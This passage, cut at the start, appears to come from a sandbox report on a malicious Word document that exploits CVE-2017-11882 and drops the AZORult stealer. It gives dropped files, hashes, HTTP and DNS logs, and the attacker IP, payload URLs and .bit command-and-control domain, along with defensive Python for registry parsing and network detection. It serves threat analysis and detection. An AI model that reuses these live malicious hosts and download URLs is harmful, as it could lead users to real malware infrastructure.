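MRU_ITEM = re.compile(r"\[F([0-9A-Fa-f]{8})\]\[T([0-9A-Fa-f]{16})\]\[O([0-9A-Fa-f]{8})\]\*(.+)")
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")  # 8+ printable UTF-16LE characters


def filetime_to_datetime(ticks):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def parse_mru_item(value):
    """Split a Word File MRU / Place MRU item into flags, timestamp and target."""
    m = MRU_ITEM.fullmatch(value)
    if not m:
        raise ValueError(f"not an Office MRU item: {value!r}")
    flags, filetime, other, target = m.groups()
    return {"flags": int(flags, 16),
            "timestamp": filetime_to_datetime(int(filetime, 16)),
            "other": int(other, 16),
            "target": target}


def parse_startup_item(value_name, hex_value):
    """Resiliency\\StartupItems value: bytes 0-3 echo the value name, bytes 4-7
    hold the owning PID (little-endian DWORD); paths are carved, not parsed."""
    blob = bytes.fromhex(hex_value)
    tag = blob[:3].decode("ascii", "replace")
    return {
        "tag": tag,
        "tag_matches_name": tag == value_name,
        "pid": int.from_bytes(blob[4:8], "little"),
        "strings": [m.group(0).decode("utf-16-le") for m in UTF16_RUN.finditer(blob)],
    }


# Values copied from the registry table above: File MRU Item 1 and the "5+$"
# StartupItems entry, both written by PID 3704 (WINWORD.EXE).
FILE_MRU_ITEM = "[F00000000][T01D4772D59ACAF70][O00000000]*http://104.206.242.208/wiininilog.doc"
STARTUP_ITEM_5PLUS = "352B2400780E00000600000001000000D200000002000000C20000000400000063003A005C00750073006500720073005C00610064006D0069006E005C0061007000700064006100740061005C006C006F00630061006C005C006D006900630072006F0073006F00660074005C00770069006E0064006F00770073005C00740065006D0070006F007200610072007900200069006E007400650072006E00650074002000660069006C00650073005C0063006F006E00740065006E0074002E006D0073006F005C00330063006400360032003100610061002E0064006F006300000000000000"

if __name__ == "__main__":
    mru = parse_mru_item(FILE_MRU_ITEM)
    print(mru["timestamp"].isoformat(), mru["target"])
    item = parse_startup_item("5+$", STARTUP_ITEM_5PLUS)
    print(item["pid"], item["strings"])
```

The decoded timestamp (06:36:16 UTC) sits one hour before the analysis date shown at the top of the report, which is the sandbox's local clock; when correlating MRU entries with other hosts, convert everything to UTC first.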

Files activity

Executable files
5
Suspicious files
25
Text files
7
Unknown types
2

Dropped files

PID
Process
Filename
Type
2596
wiinilog.exe
C:\Users\admin\AppData\Roaming\navicula.exe
executable
MD5: 8073f2e2453cc4267b6cac9ea6fd5156
SHA256: 7440684ebb6d01a9293a966d78d56ed2f567896151e5a3ea2f6ec5fdc1ae5db3
3288
EQNEDT32.EXE
C:\Users\admin\AppData\Roaming\wiinilog.exe
executable
MD5: 8073f2e2453cc4267b6cac9ea6fd5156
SHA256: 7440684ebb6d01a9293a966d78d56ed2f567896151e5a3ea2f6ec5fdc1ae5db3
3288
EQNEDT32.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\12[1].ex
executable
MD5: 8073f2e2453cc4267b6cac9ea6fd5156
SHA256: 7440684ebb6d01a9293a966d78d56ed2f567896151e5a3ea2f6ec5fdc1ae5db3
2596
wiinilog.exe
C:\Users\admin\AppData\Local\Temp\nsk7F1F.tmp\System.dll
executable
MD5: 75ed96254fbf894e42058062b4b4f0d1
SHA256: a632d74332b3f08f834c732a103dafeb09a540823a2217ca7f49159755e8f1d7
2596
wiinilog.exe
C:\Users\admin\AppData\Local\Temp\indweller.dll
executable
MD5: cbb335b0297b012c35e07586f7f4f917
SHA256: 4fc043350dfd1629f918d457cdc2d2b381deda9ceeea516d539625b5eda49839
3704
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: a3f98568e7bc2f5c39ecf6921bdea314
SHA256: 5e03884365ff5a45dbc9d2306b1aa6cabbdc46203a474ca4b5564607cd24baad
3704
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\104.206.242.208.url
text
MD5: 450e87158c232cb47f15f9163adee323
SHA256: 5b4ceb695980876ef314a469f59e6c419ee7099058989a52e308a92ab263aa1f
3704
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\wiininilog.doc.url
text
MD5: 8a475c6581d9ff1d9e46878f9bed31ac
SHA256: 248ddc628c393a3ddc59dfa7e334abfa8cf6db6c43d2dfb63b0ce6d3f7e72237
2596
wiinilog.exe
C:\Users\admin\AppData\Local\Temp\made.rtf
text
MD5: 8274425de767b30b2fff1124ab54abb5
SHA256: 0d6afb7e939f0936f40afdc759b5a354ea5427ec250a47e7b904ab1ea800a01d
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\CVR2E2F.tmp.cvr
––
MD5:  ––
SHA256:  ––
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3CD621AA.doc
text
MD5: 49ee599352e1cc20741f38af367acadc
SHA256: 27c382c7875688dbe2540e3507d36b29071beca044d10c52dc82f461856368c4
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BA226967.doc
––
MD5:  ––
SHA256:  ––
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0C26F31.doc
––
MD5:  ––
SHA256:  ––
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\wiininilog[1].doc
text
MD5: 49ee599352e1cc20741f38af367acadc
SHA256: 27c382c7875688dbe2540e3507d36b29071beca044d10c52dc82f461856368c4
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{AE61C987-E616-4505-ABA6-3CB40E2558A2}.FSD
binary
MD5: f7b56e09c4cf544f870d27124d2eeff5
SHA256: 60ed4ed4ea92eaaeeb4ba36d3e9e81a3bc7a52b8c560b5588871e93ef5598abc
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{6E5848D7-2C31-451F-86E2-DE5B4F138975}.FSD
binary
MD5: 8ae608f122b5a77453db2a24d988d1da
SHA256: ae8e34468e25559bb0c61bb96f7a44e57f2055f4f4bb07c61723691552ca2932
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
binary
MD5: 26bbd107ab21feab9f2cb68518335aa0
SHA256: a9ad18ba44b69ffa73682a402c9f65e0e4f8af6f18360b64033a54d569dc3a95
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
binary
MD5: 4c125b14785c73854692a411bd70426e
SHA256: 70edd038f4f218b58971575396c3d7cf7c4211245591e6e9bc5046ee23c96c08
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\{60157C6E-6759-4130-96DB-BBFF7D5FD502}
––
MD5:  ––
SHA256:  ––
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF
binary
MD5: fae2498568afdc83555d1e1fb4198aac
SHA256: 06d4067403973c06303f442fd204fde85a957fba725f7de4eebc2a4b14d74ee6
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD
binary
MD5: d5cef42f5de312ba509c22aca253401a
SHA256: 56b4610d67b5d2f7626d2635f42a5a128b5fb5406868b8b4224e05c6f1411962
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\{706203E7-B9EC-49B0-A795-7A7D983B4B87}
––
MD5:  ––
SHA256:  ––
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\~$e41bc7e38faf44b40023884d4e14168c6e259f807ab5fbe3b1ba2e1512ce4c.docx
pgc
MD5: 906817fd4e974dc60992a46466c0d54b
SHA256: 9df24106b8c1aeb2afa4f549eae334375d915f47ba32c504d3c582cb4e14551d
3704
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
pgc
MD5: d60d20a20527b37836471105c937c8c9
SHA256: d732ed54e40aa23e1f5e768da5969b8da55c63266851b617b2e390ce2bf33573
2596
wiinilog.exe
C:\Users\admin\AppData\Local\Temp\Tabulator
binary
MD5: c4c72325c9a8581d0cb70ade7e69bf53
SHA256: d01e209e2d2df2891fdf7c1939593c1ad8343cb74687cce51081b00a7bed0f66

Find more information about the static content and download it in the full report

Network activity

HTTP(S) requests
21
TCP/UDP connections
14
DNS requests
3
Threats
20

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
3704 WINWORD.EXE OPTIONS 200 104.206.242.208:80 http://104.206.242.208/ US –– –– suspicious
3704 WINWORD.EXE HEAD 200 104.206.242.208:80 http://104.206.242.208/wiininilog.doc US –– –– suspicious
–– –– OPTIONS 200 104.206.242.208:80 http://104.206.242.208/ US –– –– suspicious
–– –– PROPFIND 405 104.206.242.208:80 http://104.206.242.208/ US html –– suspicious
–– –– PROPFIND 405 104.206.242.208:80 http://104.206.242.208/ US html –– suspicious
3704 WINWORD.EXE GET 200 104.206.242.208:80 http://104.206.242.208/wiininilog.doc US text –– suspicious
3704 WINWORD.EXE HEAD 200 104.206.242.208:80 http://104.206.242.208/wiininilog.doc US text –– suspicious
3704 WINWORD.EXE HEAD 200 104.206.242.208:80 http://104.206.242.208/wiininilog.doc US –– –– suspicious
–– –– PROPFIND 405 104.206.242.208:80 http://104.206.242.208/ US html –– suspicious
–– –– PROPFIND 405 104.206.242.208:80 http://104.206.242.208/ US html –– suspicious
3704 WINWORD.EXE HEAD 200 104.206.242.208:80 http://104.206.242.208/wiininilog.doc US –– –– suspicious
3704 WINWORD.EXE GET 304 104.206.242.208:80 http://104.206.242.208/wiininilog.doc US –– –– suspicious
3704 WINWORD.EXE HEAD 200 104.206.242.208:80 http://104.206.242.208/wiininilog.doc US –– –– suspicious
–– –– PROPFIND 405 104.206.242.208:80 http://104.206.242.208/ US html –– suspicious
–– –– PROPFIND 405 104.206.242.208:80 http://104.206.242.208/ US html –– suspicious
3704 WINWORD.EXE GET 304 104.206.242.208:80 http://104.206.242.208/wiininilog.doc US –– –– suspicious
3704 WINWORD.EXE HEAD 200 104.206.242.208:80 http://104.206.242.208/wiininilog.doc US –– –– suspicious
3288 EQNEDT32.EXE GET 200 104.206.242.208:80 http://104.206.242.208/12.ex US executable –– suspicious
–– –– PROPFIND 405 104.206.242.208:80 http://104.206.242.208/ US html –– suspicious
–– –– PROPFIND 405 104.206.242.208:80 http://104.206.242.208/ US html –– suspicious
–– –– POST 200 46.229.214.47:80 http://dogoodtome.bit/index.php RU text text malicious

Download the PCAP, analyze network streams, HTTP content and more in the full report

Connections

PID Process IP ASN CN Reputation
3704 WINWORD.EXE 104.206.242.208:80 Eonix Corporation US suspicious
–– –– 104.206.242.208:80 Eonix Corporation US suspicious
3288 EQNEDT32.EXE 104.206.242.208:80 Eonix Corporation US suspicious
–– –– 151.80.147.153:53 OVH SAS FR suspicious
–– –– 91.217.137.44:53 Meganet-2003 LLC RU unknown
–– –– 80.233.248.109:53 SIA PostMet LV unknown
–– –– 46.229.214.47:80 RU malicious

DNS requests

Domain IP Reputation
dogoodtome.bit No response malicious

Threats

PID Process Class Message
3704 WINWORD.EXE A Network Trojan was detected SC TROJAN_DOWNLOADER Suspicious DOC loader of embedded OLE from external source
3704 WINWORD.EXE A Network Trojan was detected MALWARE [PTsecurity] Possible RTF CVE-2017-11882 document
3288 EQNEDT32.EXE A Network Trojan was detected ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1
3288 EQNEDT32.EXE Potential Corporate Privacy Violation ET POLICY PE EXE or DLL Windows file download HTTP
3288 EQNEDT32.EXE A Network Trojan was detected ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2
3288 EQNEDT32.EXE A Network Trojan was detected ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2
3288 EQNEDT32.EXE Potentially Bad Traffic ET INFO SUSPICIOUS Dotted Quad Host MZ Response
–– –– Potentially Bad Traffic ET CURRENT_EVENTS DNS Query Domain .bit
–– –– Potentially Bad Traffic ET CURRENT_EVENTS DNS Query Domain .bit
–– –– Potentially Bad Traffic ET CURRENT_EVENTS DNS Query Domain .bit
–– –– Potentially Bad Traffic ET CURRENT_EVENTS DNS Query Domain .bit
–– –– Potentially Bad Traffic ET CURRENT_EVENTS DNS Query Domain .bit
–– –– Potentially Bad Traffic ET CURRENT_EVENTS DNS Query Domain .bit
–– –– Potentially Bad Traffic ET CURRENT_EVENTS DNS Query Domain .bit
–– –– Potentially Bad Traffic ET CURRENT_EVENTS DNS Query Domain .bit
–– –– Potentially Bad Traffic ET CURRENT_EVENTS DNS Query Domain .bit
–– –– Potentially Bad Traffic ET CURRENT_EVENTS DNS Query Domain .bit
–– –– Potentially Bad Traffic ET CURRENT_EVENTS DNS Query Domain .bit
–– –– A Network Trojan was detected ET TROJAN AZORult Variant.4 Checkin M2
–– –– A Network Trojan was detected MALWARE [PTsecurity] AZORult client request
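Two points in the network data are easy to misread. The OPTIONS and PROPFIND requests to http://104.206.242.208/ are WebDAV probing of the host Word was told to fetch wiininilog.doc from; most of them are not attributed to WINWORD.EXE, most likely because the WebClient service (the WebDAV mini-redirector) issues them on Word's behalf, so a detection keyed on the Office process misses them while one keyed on WebDAV methods to a bare-IP host does not. Second, dogoodtome.bit is a Namecoin name that the ICANN root cannot answer, which is why the DNS table shows "No response"; the three port-53 connections to 151.80.147.153, 91.217.137.44 and 80.233.248.109 are the loader using its own resolver list, and that is how AZORult still reached 46.229.214.47 for its check-in. The Python below is an example added by the editor, not part of the report, and runs over constructed records built from these tables; the approved-resolver set and the example.com query are assumptions.

```python
"""Network-side rules for the C2 stage of this report.

Editor-added example over constructed records; not ANY.RUN output. Hosts, ports,
methods and the .bit domain are taken from the tables above; APPROVED_RESOLVERS
and the example.com query are assumptions."""
from ipaddress import ip_address

APPROVED_RESOLVERS = {"10.0.0.53"}                      # assumed corporate resolver
ALT_ROOT_TLDS = {"bit", "emc", "coin", "lib", "bazar"}  # Namecoin and Emercoin zones
WEBDAV_PROBES = {"OPTIONS", "PROPFIND"}
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
DOCUMENT_EXTENSIONS = (".doc", ".docx", ".dot", ".dotm", ".rtf")


def is_bare_ip(host):
    try:
        ip_address(host)
    except ValueError:
        return False
    return True


def rogue_resolvers(connections):
    """Port-53 peers other than the approved resolvers. A .bit name cannot be
    answered from the ICANN root, so the malware has to bring its own resolvers."""
    return sorted({c["dst_ip"] for c in connections
                   if c["dst_port"] == 53 and c["dst_ip"] not in APPROVED_RESOLVERS})


def alt_root_queries(queries):
    """Queried names whose TLD exists only in a blockchain-based root."""
    return [q for q in queries if q.rstrip(".").rsplit(".", 1)[-1].lower() in ALT_ROOT_TLDS]


def remote_document_loads(requests):
    """WebDAV probes to a bare-IP host (often with no process attributed, as in
    the table above) and Office processes fetching a document from such a host."""
    hits = []
    for r in requests:
        if not is_bare_ip(r["host"]):
            continue
        if r["method"] in WEBDAV_PROBES:
            hits.append(("webdav_probe_to_ip", r["method"], r["url"]))
        elif r["process"].lower() in OFFICE_IMAGES and r["url"].lower().endswith(DOCUMENT_EXTENSIONS):
            hits.append(("office_remote_document", r["method"], r["url"]))
    return hits


# Constructed records built from the Connections, DNS and HTTP tables above.
SAMPLE_CONNECTIONS = [
    {"dst_ip": "104.206.242.208", "dst_port": 80},
    {"dst_ip": "151.80.147.153", "dst_port": 53},
    {"dst_ip": "91.217.137.44", "dst_port": 53},
    {"dst_ip": "80.233.248.109", "dst_port": 53},
    {"dst_ip": "46.229.214.47", "dst_port": 80},
    {"dst_ip": "10.0.0.53", "dst_port": 53},  # assumed legitimate lookup
]
SAMPLE_DNS = ["dogoodtome.bit", "www.example.com"]  # second name is constructed
SAMPLE_HTTP = [
    {"process": "WINWORD.EXE", "method": "OPTIONS", "host": "104.206.242.208", "url": "http://104.206.242.208/"},
    {"process": "", "method": "PROPFIND", "host": "104.206.242.208", "url": "http://104.206.242.208/"},
    {"process": "WINWORD.EXE", "method": "GET", "host": "104.206.242.208", "url": "http://104.206.242.208/wiininilog.doc"},
    {"process": "EQNEDT32.EXE", "method": "GET", "host": "104.206.242.208", "url": "http://104.206.242.208/12.ex"},
    {"process": "", "method": "POST", "host": "dogoodtome.bit", "url": "http://dogoodtome.bit/index.php"},
]

if __name__ == "__main__":
    print("rogue resolvers:", rogue_resolvers(SAMPLE_CONNECTIONS))
    print("alt-root queries:", alt_root_queries(SAMPLE_DNS))
    for hit in remote_document_loads(SAMPLE_HTTP):
        print(*hit)
```

The EQNEDT32.EXE download of 12.ex is intentionally not matched here; it is an endpoint signal (a non-Office process that should never open a socket) rather than a network-pattern one.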

Debug output strings

No debug info.